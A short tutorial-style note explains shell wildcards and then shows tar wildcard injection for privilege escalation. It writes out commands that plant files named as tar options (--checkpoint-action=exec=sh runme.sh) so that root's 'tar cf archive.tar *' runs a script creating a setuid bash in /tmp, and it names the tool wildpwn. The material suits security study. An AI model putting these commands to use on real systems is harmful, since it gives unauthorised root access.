Wildcard

The wildcard is a character or set of characters that can be used as a replacement for some range/class of characters. Wildcards are interpreted by the shell before any other action is taken.

Some Wildcards character:

* An asterisk matches any number of character in a filename, including none.

? The question mark matches any single character.

[ ] Brackets enclose a set of characters, any one of which may match a single character at that position.

– A hyphen used within [ ] denotes a range of characters.

~ A tilde at the beginning of a word expands to the name of your home directory. Append another user’s login name to the character, it refers to that user’s home directory.

Example: Vulnerable script: tar cf archive.tar *

By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that's where the wildcard comes in handy.

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh

touch /home/user/--checkpoint=1

touch /home/user/--checkpoint-action=exec=sh\ runme.sh

or

echo "" > "--checkpoint-action=exec=sh runme.sh"

echo "" > --checkpoint=1

Tool: wildpwn